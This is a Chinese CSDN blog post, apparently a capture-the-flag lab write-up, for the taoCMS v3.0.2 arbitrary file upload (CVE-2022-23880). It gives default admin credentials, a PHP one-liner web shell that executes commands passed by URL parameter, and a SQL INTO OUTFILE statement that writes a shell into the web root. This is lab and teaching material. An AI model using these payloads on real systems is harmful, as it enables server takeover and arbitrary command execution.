春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量608 收藏 1
点赞数
分类专栏: i春秋 文章标签: 安全 web安全 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/131881952
版权

目录

一、题目

二、进入题目:

 2.1 文件写入一句话木马:

2.2 用SQL语句写入木马:

一、题目

靶标介绍:

taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码

二、进入题目:

访问/admin 

admin:tao

 后台管理页面:

新建文件

 2.1 文件写入一句话木马:

<?php system($_GET[1]);phpinfo();?>

 访问 /shell.php?1=cat /flag

flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0} 

<?php system('cat /flag');?>

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

2.2 用SQL语句写入木马:

 可以访问:

 写入文件一句话木马:

select "<?php system('cat /flag');?>" into outfile '/var/www/html/cat.php'

 访问/cat.php

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

橙子学不会.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-23880
m0_51674437的博客
07-23 237
CVE-2022-23880漏洞复现和代码审计
春秋云境CVE-2022-23880
一只爱吃橙子的羊
12-06 1410
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
春秋云境CVE-2022-23880靶场
2301_78019493的博客
05-19 620
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
taoCMS 任意文件上传CVE-2022-23880
weixin_68999845的博客
08-16 745
Taocms v3.0.2 版本存在安全漏洞,该漏洞源于 taoCMS v3.0.2 File Management 模块存在任意文件上传漏洞。2.点击文件管理,在方框中设置文件名称**(不可点击“上传功能”,此功能会访问本地文件,该部分做了文件类型过滤,无法上传php文件)**1.进入后台(/taocms/admin/admin.php?第96行语句存在任意文件的创建(正常对的业务功能是不允许上传php文件的,但新建功能未对文件后缀做任何处理)Taocms是中国的一个微型 Cms(内容管理系统)。
unbuntu18.04上apache,php,mysql,phpmyadmin搭建以及cve-2022-23808复现
qq_59950255的博客
05-24 647
大致流程如下前言安装apache安装mysql服务器安装php7phpmyadmin安装(因为复现该cve,所用版本是5.1.1)cve-2022-23805 前言 漏洞复现,本来打算使用phpstudy集成环境,只切换phpmyadmin版本,没想到是各种稀奇古怪报错,可能是php版本之类的一切原因,那就从0开始,在自己ubuntu服务器上搭建环境 安装apache 首先先检测更新源 sudo apt update和sudo apt upgrade随后执行apache安装命令sudo apt insta
春秋云境 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
qq_38409397的博客
03-22 344
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
需要测试vCenter 6.5 Linux(VCSA)/窗口等待测试vCenter 6.7 Linux(VCSA)/窗口等待测试vCenter 7.0 Linux(VCSA)/窗口等待测试细节突破为任意文件上传存在问题的接口为/ui/vropspluginui/rest/services/...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
春秋云境CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
果粒程
12-03 676
春秋云境CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
春秋云镜 CVE-2022-23880
qq_22002773的博客
07-11 126
春秋云镜 CVE-2022-23880
Apache Jena XXE漏洞CVE-2022-28890)
murphysec的博客
05-06 1174
CVE-2022-28890漏洞是由于4.5.0 版本之前的 jena-core 没有对 XML 外部实体引用做限制,攻击者可利用恶意的 xml 文件实现读取任意文件。该漏洞影响范围小,建议受影响用户尽快升级到 4.5.0 版本。 编号      CVE-2022-28890 标题 Apache Jena XXE漏洞 描述 Apache Jena 是一个免费的开源Java框架,用于构建语义Web和链接数据应用程序。在4.5.0版本之前的 Apache Jena 中,攻击者可以通过引用 X
等保测评和安全运维
weixin_64392888的博客
06-11 650
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1410
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 426
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 963
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 939
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值